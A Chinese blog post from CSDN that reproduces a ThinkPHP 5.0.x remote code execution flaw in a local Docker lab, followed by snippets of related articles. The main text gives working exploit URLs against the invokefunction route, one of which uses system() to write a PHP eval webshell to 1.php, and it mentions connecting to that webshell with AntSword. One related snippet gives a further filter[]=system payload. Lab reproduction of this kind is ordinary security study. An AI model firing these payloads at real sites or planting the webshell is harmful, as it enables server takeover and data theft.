ThinkPHP5--rce远程代码执行

最新推荐文章于 2024-06-23 19:07:57 发布
最新推荐文章于 2024-06-23 19:07:57 发布
阅读量603 收藏 8
点赞数 9
文章标签: 服务器 linux 网络 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74402888/article/details/138239674
版权
本文详细介绍了ThinkPHP5的一个安全漏洞,涉及未正确处理控制器名导致的远程命令执行问题,提供漏洞复现步骤以及利用payload进行攻击的实例,包括如何通过call_user_func_array执行系统命令。
摘要由CSDN通过智能技术生成

一、漏洞原理

在ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

二、影响版本

ThinkPHP5:

5.0.x~5.0.23;

三、漏洞复现

1.运行此靶场

sudo docker-compose up -d

2.查看启动环境

sudo docker ps

3.访问网页寻找漏洞

payload参数

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

参数解释:

http://192.168.10.129:8080/index.php: 这是指向你的服务器的地址,其中192.168.10.129是服务器的IP地址,8080是端口号,而index.php是入口文件。

?s=/Index/\think\app/invokefunction&function=call_user_func_array: 这是URL中的查询字符串部分,它包含了要执行的路由和参数。

s=/Index/\think\app/invokefunction: 这部分似乎是在尝试调用ThinkPHP的某个内部方法或路由。/think\app/invokefunction可能是一个试图调用invokefunction方法的路径。

function=call_user_func_array: 这部分是指定要执行的函数,即call_user_func_array。call_user_func_array是PHP中的一个函数,它允许你调用一个用户定义的函数,并为其传递一个参数数组。

结合这两部分,这个URL似乎是在尝试通过ThinkPHP的某个功能或漏洞来远程执行任意的PHP代码

写入一句话木马到1.php文件

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20"<?php%20@eval(\$_POST[1]);%20?>">>1.php

蚁剑连接

可以访问root权限的文件

4.关闭此靶场环境

sudo docker-compose down

小春学渗透
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2458
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
远程代码执行--ThinkPHP
weixin_44940180的博客
08-20 409
漏洞 漏洞原因是由于框架对控制器名没有进行足够的校验 导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令 受影响的版本包括5.0和5.1版本。 漏洞影响范围 Thinkphp 5.1.0 - 5.1.31 Thinkphp 5.0.5 - 5.0.23 漏洞复现 通过phpinfo函数写出phpinfo()的信息 http://localhost/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
Thinkphp 5-RCE漏洞复现
Tender*的博客
08-10 728
ThinkPHP5披露最多得漏洞就是RCE,其中的影响版本范围非常广漏洞原理其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。影响版本不同版本 payload 不同,且5.13版本后还与debug模式有关漏洞复现进入​。
Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-23 1132
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
Thinkphp框架漏洞--->5,2024年最新网络安全进阶
2401_83947105的博客
04-14 1096
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
【攻防世界】php_rceThinkPHP5)
2302_79800344的博客
04-09 770
代码】【攻防世界】php_rceThinkPHP5漏洞)
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 7071
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
thinkphp5 rce
weixin_51558394的博客
08-17 451
thinkphp5 rce
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8498
ThinkPHP5系列远程代码执行漏洞复现(详细)
ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路
shelter1234567的博客
01-16 1755
本节我将分析thinkphp5.0.x 版本的RCE漏洞,根据漏洞的研究模拟挖掘此漏洞的思路
thinkphp5调用shell脚本_【ThinkPHP5】远程代码执行
weixin_39607710的博客
01-03 500
跟着小编一起动手操作吧!ThinkPHP5远程代码执行漏洞实验内容ThinkPHP是一个免费开源的快速、简单、面向对象的轻量级PHP开发框架,是为了敏捷Web应用开发和简化企业应用开发而诞生。ThinkPHP 5.0版本是一个颠覆和重构版本,采用全新的架构思想,引入了更多的PHP新特性,优化了核心,减少了依赖,实现了真正的惰性加载,支持composer,并针对API开发做了大量的优化。ThinkP...
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x , 可以利用poc直接检测目标网站是否存在漏洞
漏洞通告ThinkPHP远程代码执行漏洞
05-05
【漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP-request函数远程代码执行1
08-03
在2019年1月11日,ThinkPHP框架被曝出存在一个严重的远程代码执行RCE)漏洞,该漏洞主要涉及ThinkPHP 5.0.*版本。这个漏洞的根源在于框架处理HTTP请求方法的方式,特别是`isGet`、`isPost`、`isPut`、`isDelete`、...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP多语言模块文件包含RCE复现详细教程
ALLEN'Blog
02-14 2137
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Think PHP 5 RCE漏洞复现及排查
dayouzi的博客
08-11 2340
ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。
thinkphp5-rce
shierbai的博客
05-17 449
method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=id(系统命令)此之前的版本中,获取method的方法没有正确处理方法名,攻击者可以调用request类任意方法并构造利用链,从而导致远程代码执行漏洞。其版本5中,没有正确处理控制器名,导致网站在没有开启强制路由的情况下(默认情况)可以执行任意方法,从而导致远程命令执行漏洞。应用:很多cms是基于thinkphp5二次开发的,所以出问题的话,会影响很多基于其开发的网站。
poc-yaml-thinkphp5023-method-rce poc1
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行解析漏洞,攻击者可以利用该漏洞在服务器执行任意命令。poc-yaml-thinkphp5023-method-rce 是一个利用该漏洞的示例程序。 通过 poc1 工具,攻击者可以利用 YAML 文件解析的漏洞,实现远程代码执行。攻击者通过构造恶意 YAML 文件,并将其作为参数发送给目标应用的接口,从而触发代码执行。 该漏洞的危害性很高,攻击者可以在受影响的应用上执行任意命令,例如查看、修改或删除敏感文件,创建新用户账户,获取数据库信息等。这可能导致严重的安全风险和数据泄露。 为了防止此漏洞的利用,建议使用 ThinkPHP 的最新版本,并及时更新框架。此外,应开启严格的访问控制,限制对敏感函数和文件的访问。同时,将任何用户输入数据进行严格过滤和验证,以防止注入攻击。最重要的是,及时关注和安装安全补丁,保持应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值